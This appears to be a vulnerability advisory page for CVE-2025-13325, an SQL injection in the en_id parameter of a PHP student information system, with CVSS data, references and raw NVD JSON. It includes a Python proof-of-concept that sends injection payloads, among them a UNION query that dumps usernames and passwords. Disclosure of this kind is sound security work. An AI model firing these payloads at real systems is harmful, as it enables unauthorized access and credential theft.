CVE-2025-13325

Description

A vulnerability was determined in itsourcecode Student Information System 1.0. The affected element is an unknown function of the file /enrollment_edit1.php. Executing manipulation of the argument en_id can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:facebook-julykringcadayona:student_information_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Student Information System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-13325 SQL Injection PoC
# Target: itsourcecode Student Information System 1.0
# File: /enrollment_edit1.php
# Parameter: en_id

target_url = "http://target.com/enrollment_edit1.php"

# Basic SQL Injection test payloads
payloads = [
    "1' OR '1'='1",  # Basic authentication bypass
    "1' UNION SELECT NULL--",  # Union-based injection test
    "1' AND SLEEP(5)--",  # Time-based blind injection
    "1' AND 1=1--",  # Boolean-based injection test
]

def test_sql_injection(url, param='en_id'):
    print(f"[*] Testing SQL injection on {url}")
    print(f"[*] Target parameter: {param}")
    
    for payload in payloads:
        data = {param: payload}
        try:
            response = requests.post(url, data=data, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.text)}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with payload {payload}: {e}")

# Data extraction example (requires manual adaptation)
def extract_database_info(url):
    # Database version extraction
    version_payload = "1' UNION SELECT @@version--"
    # Database name extraction  
    dbname_payload = "1' UNION SELECT database()--"
    # Users table extraction
    users_payload = "1' UNION SELECT GROUP_CONCAT(user_id,':',username,':',password) FROM users--"
    
    print("[*] Example extraction payloads:")
    print(f"    Version: {version_payload}")
    print(f"    Database: {dbname_payload}")
    print(f"    Users: {users_payload}")

if __name__ == "__main__":
    test_sql_injection(target_url)
    extract_database_info(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13325
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13325
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13325/
[4] VulDB https://vuldb.com/cve/CVE-2025-13325
[5] https://github.com/chenxiyue-2006/CVE/issues/1
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.332669
[8] https://vuldb.com/?id.332669
[9] https://vuldb.com/?submit.691929
[10] https://github.com/chenxiyue-2006/CVE/issues/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13325", "sourceIdentifier": "[email protected]", "published": "2025-11-18T00:15:48.823", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in itsourcecode Student Information System 1.0. The affected element is an unknown function of the file /enrollment_edit1.php. Executing manipulation of the argument en_id can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:facebook-julykringcadayona:student_information_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D222B7CE-899E-4DD7-AD37-D0D82398BC1A"}]}]}], "references": [{"url": "https://github.com/chenxiyue-2006/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.332669", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332669", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691929", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/chenxiyue-2006/CVE/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}